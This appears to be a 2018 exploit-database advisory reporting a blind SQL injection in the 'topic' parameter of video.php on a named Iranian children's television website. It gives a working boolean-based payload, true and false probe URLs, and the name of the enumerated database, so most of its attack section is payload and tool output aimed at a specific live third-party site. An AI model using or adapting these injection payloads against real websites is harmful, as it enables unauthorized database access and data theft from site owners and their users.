Hodhodfarsi.tv SQL Injection Vulnerability

2018.11.11
ir kodak (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Hodhodfarsi.tv SQL Injection Vulnerability # Exploit Author: kodak # Date: 2018-11-11 # Vendor Homepage: http://www.hodhodfarsi.tv/ # Category : webapps # Tested on: Windows and Linux # CWE : CWE-89 1. Description: -------------------- Hod hod farsi is a iranian television channel for children and teenagers . That website has a SQL Injection vulnerability . 2. Exploit/POC: -------------------- hodhodfarsi.tv/video.php?topic=[SQL Injection] Parameter: topic (GET) Location : /video.php Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: topic=1' AND 9002=9002 AND 'kodak'='kodak Vector: AND [INFERENCE] Available databases [1]: [*] hodhodfa_farsi Is True --> hodhodfarsi.tv/video.php?topic=1' AND 'kodak'='kodak Is False --> hodhodfarsi.tv/video.php?topic=1' AND 'kodak'='PWRDS 3. Screenshot -------------------- https://imgur.com/a/LRF1Whb https://imgur.com/a/aCVDkvx


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top